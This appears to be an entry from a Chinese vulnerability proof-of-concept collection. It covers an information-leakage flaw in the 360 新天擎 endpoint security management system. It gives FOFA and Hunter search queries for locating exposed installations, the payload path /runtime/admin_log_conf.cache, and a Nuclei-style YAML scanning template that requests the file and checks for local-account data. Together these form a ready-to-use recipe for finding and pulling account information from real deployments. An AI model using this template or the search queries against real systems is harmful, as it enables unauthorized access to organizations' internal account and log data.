2-1360-360新天擎终端安全管理系统-InformationLeakage
漏洞描述:
360新天擎终端安全管理系统,存在admin_log_conf.cache接口的信息泄露。
网站图片:
网络测绘:
fofa语法:
title=“360新天擎”
Hunter 语法:
web.title=“360新天擎”
漏洞复现:
payload:
/runtime/admin_log_conf.cache
效果图:
Yaml模板
id: 2-1360-InformationLeakage
info:
name: 2-1360-InformationLeakage
author: Kpanda
severity: Low
description:
reference:
- https://mp.weixin.qq.com/s/_Hoi_ESDEEIL81RY37nDcQ
tags: 360,InformationLeakage
http:
- raw:
- |
GET /runtime/admin_log_conf.cache HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
matchers:
- type: dsl
dsl:
- "status_code==200"
- "contains(body, '本地账户')"
condition: and